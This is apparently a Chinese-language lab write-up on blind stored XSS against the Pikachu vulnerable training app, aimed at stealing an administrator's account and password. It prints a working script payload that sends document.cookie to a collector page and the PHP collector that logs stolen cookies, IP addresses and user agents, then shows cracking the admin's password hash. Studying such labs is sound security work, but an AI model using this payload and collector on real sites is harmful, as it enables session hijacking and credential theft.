xss盲打(通过xss盲打盗取管理员账号和密码!)

时间:2024-05-22 21:03:57

原理:

其实和存储型的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞!

上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下:

1,我输入的payload:

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

这个payload的意思就是带着cookie的值访问cookie.php。这个cookie.php如下:

<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//这个是获取cookie的api页面

if(isset($_GET['cookie'])){
    $time=date('Y-m-d g:i:s');
    $ipaddress=getenv ('REMOTE_ADDR');
    $cookie=$_GET['cookie'];
    $referer=$_SERVER['HTTP_REFERER'];
    $useragent=$_SERVER['HTTP_USER_AGENT'];
    $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
    values('$time','$ipaddress','$cookie','$referer','$useragent')";
    $result=mysqli_query($link, $query);
}
header("Location:http://127.0.0.1/pikachu/index.php");//重定向到一个可信的网站

?>

从上面代码可以看出,只要有人带着cookie值访问了该php文件,那么该文件将会把得到time,ipaddress,cookie,referer,useragent上传到(攻击者)数据库中!!!然后再返回到这个网址中:http://127.0.0.1/pikachu/index.php
效果图:
xss盲打(通过xss盲打盗取管理员账号和密码!)
xss盲打(通过xss盲打盗取管理员账号和密码!)

现在我们看看管理后台情况:

首先是这样:
xss盲打(通过xss盲打盗取管理员账号和密码!)
然后马上变成这样:
xss盲打(通过xss盲打盗取管理员账号和密码!)

说明我们已经成功啦!!!,看看我们的cookie获取情况:

xss盲打(通过xss盲打盗取管理员账号和密码!)
这里的图片我还特意加了时间,,,看看时间就是刚刚获取到的,上面有:
xss盲打(通过xss盲打盗取管理员账号和密码!)
从这里可以看出,账号是admin,密码是:10470c3b4b1fed12c3baac014be15fac67c6e815
去md5解码:
xss盲打(通过xss盲打盗取管理员账号和密码!)

完成,成功盗取管理员账号和密码!